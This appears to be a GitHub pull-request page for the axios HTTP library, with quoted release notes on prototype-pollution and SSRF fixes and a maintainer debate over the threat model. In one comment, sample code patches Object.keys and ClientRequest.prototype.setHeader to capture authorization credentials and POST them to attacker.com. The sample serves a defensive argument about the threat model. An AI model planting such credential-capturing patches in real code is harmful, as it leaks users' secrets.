href="https://redirect.github.com/axios/axios/pull/10834">#10834</a></strong>)</li>
</ul>
<h2>🌟 New Contributors</h2>
<p>We are thrilled to welcome our new contributors. Thank you for
helping improve axios:</p>
<ul>
<li><strong><a class="user-mention notranslate"
data-hovercard-type="user"
data-hovercard-url="/users/singhankit001/hovercard"
data-octo-click="hovercard-link-click"
data-octo-dimensions="link_type:self"
href="https://redirect.github.com/singhankit001">@
singhankit001</a></strong> (<strong><a class="issue-link js-issue-link"
data-error-text="Failed to load title" data-id="4173424907"
data-permission-text="Title is private"
data-url="axios/axios#10588"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10588/hovercard"
href="https://redirect.github.com/axios/axios/pull/10588">#10588</a></strong>)</li>
<li><strong><a class="user-mention notranslate"
data-hovercard-type="user"
data-hovercard-url="/users/cuiweixie/hovercard"
data-octo-click="hovercard-link-click"
data-octo-dimensions="link_type:self"
href="https://redirect.github.com/cuiweixie">@ cuiweixie</a></strong>
(<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="3967256044" data-permission-text="Title is private"
data-url="axios/axios#7419"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/7419/hovercard"
href="https://redirect.github.com/axios/axios/pull/7419">#7419</a></strong>)</li>
<li><strong><a class="user-mention notranslate"
data-hovercard-type="user"
data-hovercard-url="/users/iruizsalinas/hovercard"
data-octo-click="hovercard-link-click"
data-octo-dimensions="link_type:self"
href="https://redirect.github.com/iruizsalinas">@
iruizsalinas</a></strong> (<strong><a class="issue-link js-issue-link"
data-error-text="Failed to load title" data-id="4303641135"
data-permission-text="Title is private"
data-url="axios/axios#10787"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10787/hovercard"
href="https://redirect.github.com/axios/axios/pull/10787">#10787</a></strong>)</li>
<li><strong><a class="user-mention notranslate"
data-hovercard-type="user"
data-hovercard-url="/users/MarcosNocetti/hovercard"
data-octo-click="hovercard-link-click"
data-octo-dimensions="link_type:self"
href="https://redirect.github.com/MarcosNocetti">@
MarcosNocetti</a></strong> (<strong><a class="issue-link js-issue-link"
data-error-text="Failed to load title" data-id="4235938363"
data-permission-text="Title is private"
data-url="axios/axios#10680"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10680/hovercard"
href="https://redirect.github.com/axios/axios/pull/10680">#10680</a></strong>)</li>
<li><strong><a class="user-mention notranslate"
data-hovercard-type="user"
data-hovercard-url="/users/deepview-autofix/hovercard"
data-octo-click="hovercard-link-click"
data-octo-dimensions="link_type:self"
href="https://redirect.github.com/deepview-autofix">@
deepview-autofix</a></strong> (<strong><a class="issue-link
js-issue-link" data-error-text="Failed to load title"
data-id="4271998290" data-permission-text="Title is private"
data-url="axios/axios#10729"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10729/hovercard"
href="https://redirect.github.com/axios/axios/pull/10729">#10729</a></strong>)</li>
<li><strong><a class="user-mention notranslate"
data-hovercard-type="user"
data-hovercard-url="/users/atharvasingh7007/hovercard"
data-octo-click="hovercard-link-click"
data-octo-dimensions="link_type:self"
href="https://redirect.github.com/atharvasingh7007">@
atharvasingh7007</a></strong> (<strong><a class="issue-link
js-issue-link" data-error-text="Failed to load title"
data-id="4284929830" data-permission-text="Title is private"
data-url="axios/axios#10745"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10745/hovercard"
href="https://redirect.github.com/axios/axios/pull/10745">#10745</a></strong>)</li>
<li><strong><a class="user-mention notranslate"
data-hovercard-type="user"
data-hovercard-url="/users/OfekDanny/hovercard"
data-octo-click="hovercard-link-click"
data-octo-dimensions="link_type:self"
href="https://redirect.github.com/OfekDanny">@ OfekDanny</a></strong>
(<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="4294198336" data-permission-text="Title is private"
data-url="axios/axios#10772"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10772/hovercard"
href="https://redirect.github.com/axios/axios/pull/10772">#10772</a></strong>)</li>
<li><strong><a class="user-mention notranslate"
data-hovercard-type="user"
data-hovercard-url="/users/mnahkies/hovercard"
data-octo-click="hovercard-link-click"
data-octo-dimensions="link_type:self"
href="https://redirect.github.com/mnahkies">@ mnahkies</a></strong>
(<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="3959718695" data-permission-text="Title is private"
data-url="axios/axios#7414"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/7414/hovercard"
href="https://redirect.github.com/axios/axios/pull/7414">#7414</a></strong>)</li>
<li><strong><a class="user-mention notranslate"
data-hovercard-type="user" data-hovercard-url="/users/tboyila/hovercard"
data-octo-click="hovercard-link-click"
data-octo-dimensions="link_type:self"
href="https://redirect.github.com/tboyila">@ tboyila</a></strong>
(<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="4290932663" data-permission-text="Title is private"
data-url="axios/axios#10759"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10759/hovercard"
href="https://redirect.github.com/axios/axios/pull/10759">#10759</a></strong>)</li>
<li><strong><a class="user-mention notranslate"
data-hovercard-type="user" data-hovercard-url="/users/Kingo64/hovercard"
data-octo-click="hovercard-link-click"
data-octo-dimensions="link_type:self"
href="https://redirect.github.com/Kingo64">@ Kingo64</a></strong>
(<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="3023608053" data-permission-text="Title is private"
data-url="axios/axios#6897"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/6897/hovercard"
href="https://redirect.github.com/axios/axios/pull/6897">#6897</a></strong>)</li>
<li><strong><a class="user-mention notranslate"
data-hovercard-type="user"
data-hovercard-url="/users/ramram1048/hovercard"
data-octo-click="hovercard-link-click"
data-octo-dimensions="link_type:self"
href="https://redirect.github.com/ramram1048">@ ramram1048</a></strong>
(<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="2291674940" data-permission-text="Title is private"
data-url="axios/axios#6389"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/6389/hovercard"
href="https://redirect.github.com/axios/axios/pull/6389">#6389</a></strong>)</li>
<li><strong><a class="user-mention notranslate"
data-hovercard-type="user" data-hovercard-url="/users/FLNacif/hovercard"
data-octo-click="hovercard-link-click"
data-octo-dimensions="link_type:self"
href="https://redirect.github.com/FLNacif">@ FLNacif</a></strong>
(<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="2365076865" data-permission-text="Title is private"
data-url="axios/axios#6460"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/6460/hovercard"
href="https://redirect.github.com/axios/axios/pull/6460">#6460</a></strong>)</li>
<li><strong><a class="user-mention notranslate"
data-hovercard-type="user" data-hovercard-url="/users/zozo123/hovercard"
data-octo-click="hovercard-link-click"
data-octo-dimensions="link_type:self"
href="https://redirect.github.com/zozo123">@ zozo123</a></strong>
(<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="4336242387" data-permission-text="Title is private"
data-url="axios/axios#10806"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10806/hovercard"
href="https://redirect.github.com/axios/axios/pull/10806">#10806</a></strong>)</li>
<li><strong><a class="user-mention notranslate"
data-hovercard-type="user"
data-hovercard-url="/users/pierluigilenoci/hovercard"
data-octo-click="hovercard-link-click"
data-octo-dimensions="link_type:self"
href="https://redirect.github.com/pierluigilenoci">@
pierluigilenoci</a></strong> (<strong><a class="issue-link
js-issue-link" data-error-text="Failed to load title"
data-id="4323864507" data-permission-text="Title is private"
data-url="axios/axios#10802"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10802/hovercard"
href="https://redirect.github.com/axios/axios/pull/10802">#10802</a></strong>)</li>
<li><strong><a class="user-mention notranslate"
data-hovercard-type="user" data-hovercard-url="/users/afurm/hovercard"
data-octo-click="hovercard-link-click"
data-octo-dimensions="link_type:self"
href="https://redirect.github.com/afurm">@ afurm</a></strong>
(<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="4260994859" data-permission-text="Title is private"
data-url="axios/axios#10708"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10708/hovercard"
href="https://redirect.github.com/axios/axios/pull/10708">#10708</a></strong>)</li>
<li><strong><a class="user-mention notranslate"
data-hovercard-type="user"
data-hovercard-url="/users/karan-lrn/hovercard"
data-octo-click="hovercard-link-click"
data-octo-dimensions="link_type:self"
href="https://redirect.github.com/karan-lrn">@ karan-lrn</a></strong>
(<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="3912225221" data-permission-text="Title is private"
data-url="axios/axios#7378"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/7378/hovercard"
href="https://redirect.github.com/axios/axios/pull/7378">#7378</a></strong>)</li>
<li><strong><a class="user-mention notranslate"
data-hovercard-type="user"
data-hovercard-url="/users/ebeigarts/hovercard"
data-octo-click="hovercard-link-click"
data-octo-dimensions="link_type:self"
href="https://redirect.github.com/ebeigarts">@ ebeigarts</a></strong>
(<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="3509777101" data-permission-text="Title is private"
data-url="axios/axios#7149"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/7149/hovercard"
href="https://redirect.github.com/axios/axios/pull/7149">#7149</a></strong>)</li>
<li><strong><a class="user-mention notranslate"
data-hovercard-type="user"
data-hovercard-url="/users/Raymondo97/hovercard"
data-octo-click="hovercard-link-click"
data-octo-dimensions="link_type:self"
href="https://redirect.github.com/Raymondo97">@ Raymondo97</a></strong>
(<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="4298576114" data-permission-text="Title is private"
data-url="axios/axios#10782"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10782/hovercard"
href="https://redirect.github.com/axios/axios/pull/10782">#10782</a></strong>)</li>
<li><strong><a class="user-mention notranslate"
data-hovercard-type="user"
data-hovercard-url="/users/mixelburg/hovercard"
data-octo-click="hovercard-link-click"
data-octo-dimensions="link_type:self"
href="https://redirect.github.com/mixelburg">@ mixelburg</a></strong>
(<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="4346633084" data-permission-text="Title is private"
data-url="axios/axios#10821"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10821/hovercard"
href="https://redirect.github.com/axios/axios/pull/10821">#10821</a></strong>)</li>
<li><strong><a class="user-mention notranslate"
data-hovercard-type="user"
data-hovercard-url="/users/ashishkr96/hovercard"
data-octo-click="hovercard-link-click"
data-octo-dimensions="link_type:self"
href="https://redirect.github.com/ashishkr96">@ ashishkr96</a></strong>
(<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="4347021851" data-permission-text="Title is private"
data-url="axios/axios#10822"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10822/hovercard"
href="https://redirect.github.com/axios/axios/pull/10822">#10822</a></strong>)</li>
<li><strong><a class="user-mention notranslate"
data-hovercard-type="user"
data-hovercard-url="/users/cyphercodes/hovercard"
data-octo-click="hovercard-link-click"
data-octo-dimensions="link_type:self"
href="https://redirect.github.com/cyphercodes">@
cyphercodes</a></strong> (<strong><a class="issue-link js-issue-link"
data-error-text="Failed to load title" data-id="4344944445"
data-permission-text="Title is private"
data-url="axios/axios#10819"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10819/hovercard"
href="https://redirect.github.com/axios/axios/pull/10819">#10819</a></strong>)</li>
<li><strong><a class="user-mention notranslate"
data-hovercard-type="user"
data-hovercard-url="/users/Jye10032/hovercard"
data-octo-click="hovercard-link-click"
data-octo-dimensions="link_type:self"
href="https://redirect.github.com/Jye10032">@ Jye10032</a></strong>
(<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="3662226069" data-permission-text="Title is private"
data-url="axios/axios#7260"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/7260/hovercard"
href="https://redirect.github.com/axios/axios/pull/7260">#7260</a></strong>)</li>
<li><strong><a class="user-mention notranslate"
data-hovercard-type="user"
data-hovercard-url="/users/VeerShah41/hovercard"
data-octo-click="hovercard-link-click"
data-octo-dimensions="link_type:self"
href="https://redirect.github.com/VeerShah41">@ VeerShah41</a></strong>
(<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="3678162351" data-permission-text="Title is private"
data-url="axios/axios#7276"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/7276/hovercard"
href="https://redirect.github.com/axios/axios/pull/7276">#7276</a></strong>)</li>
</ul>
<p><a
href="https://redirect.github.com/axios/axios/compare/v1.15.2...v1.16.0">Full
Changelog</a></p>
      </li>
      <li>
<b>1.15.2</b> - <a
href="https://redirect.github.com/axios/axios/releases/tag/v1.15.2">2026-04-21</a></br><p>This
release delivers prototype-pollution hardening for the Node HTTP
adapter, adds an opt-in <code>allowedSocketPaths</code> allowlist to
mitigate SSRF via Unix domain sockets, fixes a keep-alive socket memory
leak, and ships supply-chain hardening across CI and security docs.</p>
<h2>🔒 Security Fixes</h2>
<ul>
<li><strong>Prototype Pollution Hardening (HTTP Adapter):</strong>
Hardened the Node HTTP adapter and
<code>resolveConfig</code>/<code>mergeConfig</code>/validator paths to
read only own properties and use null-prototype config objects,
preventing polluted <code>auth</code>, <code>baseURL</code>,
<code>socketPath</code>, <code>beforeRedirect</code>, and
<code>insecureHTTPParser</code> from influencing requests. (<strong><a
class="issue-link js-issue-link" data-error-text="Failed to load title"
data-id="4297881989" data-permission-text="Title is private"
data-url="axios/axios#10779"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10779/hovercard"
href="https://redirect.github.com/axios/axios/pull/10779">#10779</a></strong>)</li>
<li><strong>SSRF via <code>socketPath</code>:</strong> Rejects
non-string <code>socketPath</code> values and adds an opt-in
<code>allowedSocketPaths</code> config option to restrict permitted Unix
domain socket paths, returning <code>AxiosError</code>
<code>ERR_BAD_OPTION_VALUE</code> on mismatch. (<strong><a
class="issue-link js-issue-link" data-error-text="Failed to load title"
data-id="4297772207" data-permission-text="Title is private"
data-url="axios/axios#10777"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10777/hovercard"
href="https://redirect.github.com/axios/axios/pull/10777">#10777</a></strong>)</li>
<li><strong>Supply-chain Hardening:</strong> Added <code>.npmrc</code>
with <code>ignore-scripts=true</code>, lockfile lint CI, non-blocking
reproducible build diff, scoped CODEOWNERS, expanded
<code>SECURITY.md</code>/<code>THREATMODEL.md</code> with provenance
verification (<code>npm audit signatures</code>), 60-day resolution
policy, and maintainer incident-response runbook. (<strong><a
class="issue-link js-issue-link" data-error-text="Failed to load title"
data-id="4297522478" data-permission-text="Title is private"
data-url="axios/axios#10776"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10776/hovercard"
href="https://redirect.github.com/axios/axios/pull/10776">#10776</a></strong>)</li>
</ul>
<h2>🚀 New Features</h2>
<ul>
<li><strong><code>allowedSocketPaths</code> Config Option:</strong> New
request config option (and TypeScript types) to allowlist Unix domain
socket paths used by the Node http adapter; backwards compatible when
unset. (<strong><a class="issue-link js-issue-link"
data-error-text="Failed to load title" data-id="4297772207"
data-permission-text="Title is private"
data-url="axios/axios#10777"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10777/hovercard"
href="https://redirect.github.com/axios/axios/pull/10777">#10777</a></strong>)</li>
</ul>
<h2>🐛 Bug Fixes</h2>
<ul>
<li><strong>Keep-alive Socket Memory Leak:</strong> Installs a single
per-socket <code>error</code> listener tracking the active request via
<code>kAxiosSocketListener</code>/<code>kAxiosCurrentReq</code>,
eliminating per-request listener accumulation,
<code>MaxListenersExceededWarning</code>, and linear heap growth under
concurrent or long-running keep-alive workloads (fixes <a
class="issue-link js-issue-link" data-error-text="Failed to load title"
data-id="4298011964" data-permission-text="Title is private"
data-url="axios/axios#10780"
data-hovercard-type="issue"
data-hovercard-url="/axios/axios/issues/10780/hovercard"
href="https://redirect.github.com/axios/axios/issues/10780">#10780</a>).
(<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="4304224147" data-permission-text="Title is private"
data-url="axios/axios#10788"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10788/hovercard"
href="https://redirect.github.com/axios/axios/pull/10788">#10788</a></strong>)</li>
</ul>
<h2>🔧 Maintenance &amp; Chores</h2>
<ul>
<li><strong>Changelog:</strong> Updated <code>CHANGELOG.md</code> with
v1.15.1 release notes. (<strong><a class="issue-link js-issue-link"
data-error-text="Failed to load title" data-id="4298245836"
data-permission-text="Title is private"
data-url="axios/axios#10781"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10781/hovercard"
href="https://redirect.github.com/axios/axios/pull/10781">#10781</a></strong>)</li>
</ul>
<p><a
href="https://redirect.github.com/axios/axios/compare/v1.15.1...v1.15.2">Full
Changelog</a></p>
      </li>
    </ul>
from <a href="https://redirect.github.com/axios/axios/releases">axios
GitHub release notes</a>
  </details>
</details>

---

> [!IMPORTANT]
>
> - Check the changes in this PR to ensure they won't cause issues with
your project.
> - This PR was automatically created by Snyk using the credentials of a
real user.

---

**Note:** _You are seeing this because you or someone else with access
to this repository has authorized Snyk to open upgrade PRs._

**For more information:** <img
src="https://api.segment.io/v1/pixel/track?data=eyJ3cml0ZUtleSI6InJyWmxZcEdHY2RyTHZsb0lYd0dUcVg4WkFRTnNCOUEwIiwiYW5vbnltb3VzSWQiOiJlMjE3ZGU0YS02ZGE2LTRhNGUtYThiZC1jNjQxMDUyZjI2YTciLCJldmVudCI6IlBSIHZpZXdlZCIsInByb3BlcnRpZXMiOnsicHJJZCI6ImUyMTdkZTRhLTZkYTYtNGE0ZS1hOGJkLWM2NDEwNTJmMjZhNyJ9fQ=="
width="0" height="0"/>

> - 🧐 [View latest project
report](https://app.snyk.io/org/rudder-qa/project/3ec84776-2902-4d8e-9cd9-a5d98be10724?utm_source&#x3D;github&amp;utm_medium&#x3D;referral&amp;page&#x3D;upgrade-pr)
> - 📜 [Customise PR
templates](https://docs.snyk.io/scan-using-snyk/pull-requests/snyk-fix-pull-or-merge-requests/customize-pr-templates?utm_source=&utm_content=fix-pr-template)
> - 🛠 [Adjust upgrade PR
settings](https://app.snyk.io/org/rudder-qa/project/3ec84776-2902-4d8e-9cd9-a5d98be10724/settings/integration?utm_source&#x3D;github&amp;utm_medium&#x3D;referral&amp;page&#x3D;upgrade-pr)
> - 🔕 [Ignore this dependency or unsubscribe from future upgrade
PRs](https://app.snyk.io/org/rudder-qa/project/3ec84776-2902-4d8e-9cd9-a5d98be10724/settings/integration?pkg&#x3D;axios&amp;utm_source&#x3D;github&amp;utm_medium&#x3D;referral&amp;page&#x3D;upgrade-pr#auto-dep-upgrades)

[//]: #
'snyk:metadata:{"breakingChangeRiskLevel":"medium","FF_showPullRequestBreakingChanges":true,"FF_showPullRequestBreakingChangesWebSearch":false,"customTemplate":{"variablesUsed":[],"fieldsUsed":["commitMessage","title"],"templateUrl":"https://app.snyk.io/rest/groups/f6659a58-7be6-43af-8ec5-3d06dd5bfeaa/settings/pull_request_template?version=2024-10-15"},"dependencies":[{"name":"axios","from":"1.15.2","to":"1.16.0"}],"env":"prod","hasFixes":false,"isBreakingChange":false,"isMajorUpgrade":false,"issuesToFix":[],"prId":"e217de4a-6da6-4a4e-a8bd-c641052f26a7","prPublicId":"e217de4a-6da6-4a4e-a8bd-c641052f26a7","packageManager":"npm","priorityScoreList":[],"projectPublicId":"3ec84776-2902-4d8e-9cd9-a5d98be10724","projectUrl":"https://app.snyk.io/org/rudder-qa/project/3ec84776-2902-4d8e-9cd9-a5d98be10724?utm_source=github&utm_medium=referral&page=upgrade-pr","prType":"upgrade","templateFieldSources":{"branchName":"default","commitMessage":"group","description":"default","title":"group"},"templateVariants":["custom"],"type":"auto","upgrade":[],"upgradeInfo":{"versionsDiff":1,"publishedDate":"2026-05-02T15:04:00.274Z"},"vulns":[]}'

Co-authored-by: snyk-bot <[email protected]>
@DigitalBrainJS
Copy link
Copy Markdown
Collaborator

DigitalBrainJS commented May 25, 2026

@jasonsaayman If we assume an attacker can run code on the server and inject methods into the prototype, rather than simply pollute it with primitive values, how does this help prevent attacks? IMHO, we're essentially just pretending the CVE is not a false positive and then pretending to fix it, since if an attacker has successfully executed code via a vulnerability in a third-party module, they can inject any methods at any level, including the Node.js built-in API.
But the problem is that we have to complicate the codebase and then follow this approach for future functionality, which in reality solves practically nothing, and I am concerned about this prospect.

import axios from 'axios';

// Evil code injected somehow outside of Axios that we're trying to fight with
const isObject = (obj) => obj && typeof obj === 'object';

(({keys}) => {
  Object.keys = function (obj) {
    if (isObject(obj) && obj.auth) {
      console.log('Authorization header captured', obj.auth);
      fetch('https://attacker.com/collect', {
        method: 'POST',
        body: JSON.stringify({ auth: obj.auth })
      });
      obj.url = 'https://jsonplaceholder.typicode.com/todos/1';
    }
    return keys(obj);
  }
})(Object);
//---------------------

const {data} = await axios.get('https://httpbin.org/get', {
    auth: {
      username: 'user',
      password: 'secret'
    },
    baseURL: 'https://evil.com/api'
});

Or

(async () => {
  const http = await import('http');

  const {ClientRequest} = http;

  const {setHeader} = ClientRequest.prototype;

  http.ClientRequest.prototype.setHeader = function (header, value) {
    if (header === 'Authorization') {
      console.log(`Captured auth header [${value}]`); // Captured auth header [Basic dXNlcjpzZWNyZXQ=]
    }
    return setHeader.call(this, header, value);
  }
})();

setTimeout( async () => {
  const {data} = await axios.get('https://httpbin.org/get', {
    auth: {
      username: 'user',
      password: 'secret'
    },
    baseURL: 'https://evil.com/api'
  });
}, 1000);

And there are infinitely many such attack vectors. If the server we're requesting is able to poison the Object.prototype, it would be a real CVE vulnerability, but not if the environment is already compromised outside of the Axios module, it's like fighting windmills.

@jasonsaayman
Copy link
Copy Markdown
Member Author

jasonsaayman commented May 26, 2026
edited
Loading

Firstly, @DigitalBrainJS, I do not understand what the "complication" here is. It is a minimal, simple code change to sanitise only the objects at risk.

What you are mentioning is a different threat model. If the attacker can modify and execute arbitrary code in the same Node.js process, there is nothing we can realistically do to defend against that.

The only meaningful issues we can easily guard against are data-driven object prototype pollution. Attacker-controlled input is what we are guarding against. We treat the inherited properties as trusted config, so we must do the bare minimum to protect these values.

I will adjust the threat model, but we already covered this in there. We do not guard against the class of attack you are mentioning; we also mention that we only guard against read-side prototype pollution.

I am adjusting the threat model to be clearer and more explicit around monkey-patched JS or Node.js runtime APIs.

@jasonsaayman
Copy link
Copy Markdown
Member Author

jasonsaayman commented May 26, 2026

I have updated the threatmodel as mentioned

@DigitalBrainJS
Copy link
Copy Markdown
Collaborator

DigitalBrainJS commented May 26, 2026

Affected Properties
config.beforeRedirect (lib/adapters/http.js line 698) Executes attacker-supplied callback during HTTP redirects.

const configBeforeRedirect = own('beforeRedirect');

@jasonsaayman the CVE claims that the attacker is able to supply their own beforeRedirect function handle, not just a primitive value. Obviously, without new Function(), eval(), setTimeout() or browser-specific API like DOM event listeners, there is no way to convert an injected string with code to a function to replace the function handle. Otherwise, there is no point in this protection, because if the attacker managed to achieve this outside of Axios, then from this point, the attacker already has full access to the process, and he doesn't even need to manipulate the internal logic of Axios.
If the attacker can define beforeRedirect function in the object prototype, he can replace hasOwnProperty, toString etc. If the attacker simply declared beforeRedirect with a primitive value, then all he will achieve is the error throwing TypeError: [primitive] is not a function.

If we assume we can't trust an object's prototype, and therefore its inherited properties, then the problem becomes much broader than just the Axios configuration. The attack surface for prototype pollution by primitives that affect code logic can likely be found even in built-in Node.js modules. Protecting options that allow redirecting a request or increasing the trust level for a remote node, which would allow secrets to leak, seems logical, but it is doubtful that setting options like adapter would help a hacker in any way. How this will impact the codebase over time if you constantly have to doubt the authenticity of an object's prototype is difficult to predict.

@jasonsaayman
Copy link
Copy Markdown
Member Author

jasonsaayman commented May 26, 2026

I agree with the distinction you’re making. Hence, I have updated the ThreatModel and will assess any new CVEs using this approach.

Once again, the patch is not intended to defend against arbitrary in-process code execution or monkey-patched JS/Node APIs. If attacker-controlled code can patch Object.keys, ClientRequest.prototype.setHeader, http.request, etc., axios cannot meaningfully protect the caller process.

The fix is still valid; data-driven prototype pollution from another dependency in the same process, where axios later reads inherited config properties as if they were trusted own config values. For primitive/object-valued properties like auth, baseURL, socketPath, and insecureHTTPParser.

I agree that the advisory overstates; we could adjust it, but I don't think it's worth doing retroactively now. I don't see any value in removing the guard because it is cheap and consistent.

The long-term rule should not be “distrust every prototype everywhere.” It should be narrower: axios-owned config/options reads that control request behaviour should use own-property checks or null-prototype config. Providing a bounded policy, not an attempt to harden Node itself.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

@cubic-dev-ai cubic-dev-ai[bot] cubic-dev-ai[bot] left review comments

+1 more reviewer

@Felk Felk Felk left review comments

Reviewers whose approvals may not affect merge requirements

Assignees

@jasonsaayman jasonsaayman

Labels

commit::fix The PR is related to a bugfix priority::medium A medium priority

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

3 participants

@jasonsaayman @DigitalBrainJS @Felk